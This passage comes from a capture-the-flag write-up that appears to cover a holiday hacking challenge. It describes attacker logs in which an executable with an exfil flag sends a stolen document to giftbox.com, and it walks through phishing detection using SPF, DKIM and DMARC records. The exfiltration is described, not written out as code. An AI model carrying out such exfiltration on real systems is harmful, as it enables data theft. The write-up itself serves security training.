Here we notice the attacker using an executable called downwithsanta.exe with the -exfil flag to probably exfiltrate the NaughtyNiceList.docx to giftbox.com.
Answer: giftbox.com
The final step!
Wow! You decoded those secret messages with easy! You’re a rockstar. It seems like we’re getting near the end of this investigation, but we need your help with one more thing…
We know that the attackers stole Santa’s naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?
What is the name of the executable the attackers used in the final malicious command?
Let’s decode the final powershell encoded command. As an aside, this coincides to be the last command the attacker ran if we removed the -enc filter.
This decodes to Beware the Cube that Wombles. We submit this in our objectives tab and mark this complete.
Film Noir Island: The Blacklight District
Phish Detection
Attention, Digital Defenders! You’ve entered the realm of the Phishing Detection Agency, where advanced AI meets human insight. It’s been reported that AI has started hallucinating, and it’s up to you to discern the reality behind these emails.
Key: In the shadow-laden corridors of our menu, the Phishing link casts a crimson hue, a siren’s call warning that the number of deceitful emails is amiss. Should our digital sleuthing align perfectly with the cunning of these tricksters, watch as it transforms, glowing an emerald green in triumphant success.
Collaboration with ChatNPT: In our ongoing battle against phishing, we’ve enlisted ChatNPT to preliminarily flag potential phishing attempts. These flagged emails are stored in the Phishing Folder. However, AI isn’t foolproof! It’s up to you, the astute investigator, to dive into these emails and confirm their legitimacy. Cross-reference with our DNS records, apply your knowledge of SPF, DKIM, and DMARC, and ensure that only true phishing threats remain in the Phishing Folder. Your keen eye for detail is crucial in outsmarting these digital tricksters!
Your mission: Navigate through our virtual vault of emails, employ your knowledge of SPF, DKIM, and DMARC, and identify those deceptive, phishing attempts.
Welcome to the Geese Islands Email Security Overview. This page serves as a guide to understanding the key components of email authentication and security for our domain. Below, you will find detailed information about our SPF, DKIM, and DMARC records – the three pillars that fortify our email communications against phishing and spoofing attacks. Each section provides insights into what these records are, their importance in maintaining email integrity, and how they are configured for the utmost security of our digital correspondence.
SPF Record: Ensures emails are sent from authorized servers.
Domain
Type
Value
geeseislands.com
TXT
v=spf1 a:mail.geeseislands.com -all
DKIM Record: Verifies that the email message is not forged.
For any of the emails having the DKIM domain (d) parameter mail.geeseislands.com, DMARC as Pass and optionally SPF as pass,
-we mark them safe. If the values differ or the domain is entirely different, we mark it as phishing.
These were all the challenges that I could solve before other matters took precedence. I hope you learned something or at the very least, were amused by my less elegant way of solving things.
